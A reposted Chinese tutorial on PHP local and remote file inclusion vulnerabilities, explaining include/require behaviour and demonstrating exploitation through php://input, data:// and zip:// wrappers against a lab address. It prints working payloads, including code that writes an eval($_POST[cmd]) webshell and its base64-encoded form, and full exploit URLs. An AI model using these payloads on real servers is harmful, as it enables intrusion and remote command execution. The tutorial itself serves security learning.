任意文件包含漏洞原理解析及演示-物联网技术文章-傲云油气装备网

任意文件包含漏洞原理解析及演示

日期：2020-08-24 浏览：112 评论：0

核心提示：本文转自行云博客https://www.xy586.top/文章目录原理分类PHP文件包含的函数伪协议演示php://input 伪协议data://text/plain 伪协议zip:// 伪协议原理文件包含漏洞：即file inclusion，意思是文件包含，是指当服务器开启allow_url_include选项时，就可以通过PHP的某些特性函数（include()，require()和include_once()，requir_once()）利用URL去动态包含文件，此时如果没有对文件来源.

本文转自行云博客https://www.xy586.top/

文章目录

原理
分类
PHP文件包含的函数
伪协议
演示

php://input 伪协议
data://text/plain 伪协议
zip:// 伪协议

原理

文件包含漏洞：即file inclusion，意思是文件包含，是指当服务器开启allow_url_include选项时，就可以通过PHP的某些特性函数（include()，require()和include_once()，requir_once()）利用URL去动态包含文件，此时如果没有对文件来源进行严格审查，就会导致任意文件读取或者任意命令执行。文件包含漏洞分为本地文件包含漏洞与远程文件包含漏洞，远程文件包含漏洞是因为开启了PHP配置中的allow_url_fopen选项，选项开启之后，服务器允许包含一个远程文件，服务器通过PHP特性（函数）去包含任意文件时，由于要包含的这个文件来源过滤不严，从而可以去包含一个恶意文件，而我们可以构造这个恶意文件来达到自己的目的。

1、文件包含即程序通过包含函数调用本地或远程文件，以此来实现拓展功能

2、被包含的文件可以是各种文件格式，而当文件里面包含恶意代码，则会形成远程命令执行或文件上传漏洞。

3、文件包含漏洞主要发生在有包含语句的环境中，例如PHP所具备include、require等函数。

分类

本地文件包含LFI（local file include）当被包含的文件在服务器本地时，就形成本地文件包含
远程文件包含RFI（remote file include）当被包含的文件在第三方服务器时，叫做远程文件包含。

PHP文件包含的函数

include( )
当使用该函数包含文件时，只有代码执行到 include()函数时才将文件包含
进来，发生错误时之给出一个警告，继续向下执行。

include_once( )
功能与 Include()相同，区别在于当重复调用同一文件时，程序只调用一次

require( )require()与 include()的区别在于 require()执行如果发生错误，函数会输出
错误信息，并终止脚本的运行。

require_once( )
功能与 require()相同，区别在于当重复调用同一文件时，程序只调用一次

远程文件包含漏洞

当包含的文件在远程服务器上时，就形成了远程文件包含
远程文件包含的注意点：
1). 需要php.ini中allow_url_include = on以及allow_url_fopen=on
2). 所包含远程服务器的文件后缀不能与目标服务器语言相同。(比如目标服务器是php脚本语言解析的，
那么包含的远程服务器文件后缀不能是php)

伪协议

data:text/plain 或 data:text/plain;base64
php://input
php://filter
file://
zip://

payload

data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=;
include('php://input’); include('php://filter/read=convert.base64-encode/resource=test.php');//用于读取源码
zip://2.zip%232.php

演示

本演示为通过伪协议获取webshell
测试的PHP文件

php://input 伪协议

使用burpsuite抓包再改包
Payload: http://192.168.232.128/file.php?a=php://input

更改请求方式为post
post过去的代码为

<?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd]);?>');?>

再发包即可生成一个shell.php文件，然后使用蚁剑连接

data://text/plain 伪协议

将木马使用base64编码

<?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd]);?>');?>

编码之后

PD9QSFAgZnB1dHMoZm9wZW4oJ3NoZWxsLnBocCcsJ3cnKSwnPD9waHAgZXZhbCgkX1BPU1RbY21kXSk7Pz4nKTs/Pg==

Payload:

http://192.168.232.128/file.php?a=data://text/plain;base64,PD9QSFAgZnB1dHMoZm9wZW4oJ3NoZWxsLnBocCcsJ3cnKSwnPD9waHAgZXZhbCgkX1BPU1RbY21kXSk7Pz4nKTs/Pg==

使用该payload即可在网站根目录下生成shell.php文件，然后蚁剑连接

zip:// 伪协议

创建一个zip压缩包，里面含有带木马的PHP文件

Payload：http://192.168.232.128/file.php?a=zip://2.zip%232.php

其余步骤与data伪协议一样

打赏

所有权利归属于原作者，如文章来源标示错误或侵犯了您的权利请联系微信13520258486

更多>最近资讯中心

更多>最新资讯中心

0 条相关评论

• 阿里云制作加密情书送给女朋友	• 2020第十三届全国大学生信息安全竞赛创新实践能
• 第十三届全国大学生信息安全竞赛（线上初赛）	• 2020第十三届全国大学生信息安全竞赛crypto wp
• GitHub 标星 5.9K+！1250 个运维工程师面试问题	• 一个菜鸡的2021奇安信校招笔试总结及第一轮技术

• Esp8266天猫精灵_RGB灯_非点灯平台	• STM32F103 串口1和串口3对发数据配合蓝牙模块
• TMS570学习【1】了解什么是TMS570	• 新闻稿 \| Qt公司收购froglogic公司以巩固市场领
• [Java]SpringBoot2整合mqtt服务器EMQ实现消息订	• 苹果群控投屏同步操作原理及运用的平台APP分享

• Esp8266天猫精灵_RGB灯_非点灯平台	• STM32F103 串口1和串口3对发数据配合蓝牙模块
• TMS570学习【1】了解什么是TMS570	• 新闻稿 \| Qt公司收购froglogic公司以巩固市场领
• [Java]SpringBoot2整合mqtt服务器EMQ实现消息订	• 苹果群控投屏同步操作原理及运用的平台APP分享
• STM32查询式按键输入[直接用寄存器]	• Ubuntu系统 USB设备端口绑定
• 2021-04-14 第四次按键输入实验	• Flutter扫码功能完美实现